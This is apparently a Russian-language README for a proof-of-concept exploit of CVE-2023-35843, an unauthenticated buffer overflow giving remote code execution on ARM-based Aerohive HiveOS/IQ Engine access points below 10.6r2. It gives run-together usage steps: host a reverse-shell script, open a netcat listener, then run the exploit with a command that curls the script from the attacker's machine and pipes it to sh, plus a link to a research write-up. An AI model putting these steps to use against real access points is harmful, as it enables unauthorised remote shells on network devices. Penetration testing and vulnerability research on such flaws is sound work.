
PoC-эксплойт для CVE-2023-35843, неаутентифицированного переполнения буфера в Aerohive HiveOS/Extreme Networks IQ Engine, обеспечивающего удаленное выполнение кода на беспроводных точках доступа на базе ARM.
PoC для точек доступа на базе ARM под управлением HiveOS/IQ Engine <10.6r2.
revshell, указав IP/порт вашего перехватчика оболочкиpython3 -m http.servernc -lvnp 1337python3 poc.py <ip of ap> "curl <ip of attack box>:8000/revshell|sh"Описание здесь: https://research.aurainfosec.io/pentest/bee-yond-capacity/
